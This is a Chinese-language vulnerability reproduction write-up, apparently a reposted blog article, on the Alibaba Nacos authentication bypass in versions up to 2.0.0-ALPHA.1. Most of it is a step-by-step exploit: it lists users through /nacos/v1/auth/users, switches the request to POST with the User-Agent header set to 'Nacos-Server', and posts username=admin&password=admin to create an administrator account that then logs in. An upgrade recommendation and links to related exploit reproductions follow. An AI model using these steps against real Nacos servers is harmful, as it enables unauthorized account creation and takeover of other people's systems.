简介：

Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

漏洞概述：

Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的认证绕过漏洞。通过该漏洞，攻击者可以进行任意操作，包括创建新用户并进行登录后操作。

1、在url处添加访问一下网址即可查看到用户列表
/nacos/v1/auth/users?pageNo=1&pageSize=10

2、访问以下链接并使用burp抓包，然后把get请求改为post，把修改User-Agent头改为Nacos-Server
http://your-ip:8848/nacos/v1/auth/users

3、构造数据包添加一个admin用户，然后发送POST请求，返回为200，表示创建用户成功
username=admin&password=admin

4、回到登录界面，使用添加的账号密码进行登录，可以看到登录成功

Nacos <= 2.0.0-ALPHA.1

升级到最新版本的 Nacos

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 Nacos 权限认证绕过漏洞复现 shiro < 1.6.0的认证绕过漏洞分析(CVE-2020-13933) Nuxeo 认证绕过和RCE漏洞分析（CVE-2018-16341) Mysql 身份认证绕过漏洞（CVE-2012-2122） Mysql 身份认证绕过漏洞（CVE-2012-2122） CVE-2020-14750 WebLogic权限绕过漏洞复现 Nacos 认证绕过 Linux sudo权限提升漏洞（CVE-2021-3156） Linux sudo权限提升漏洞（CVE-2021-3156）复现 [权限提升] CVE-2021-3156 Linux sudo 漏洞复现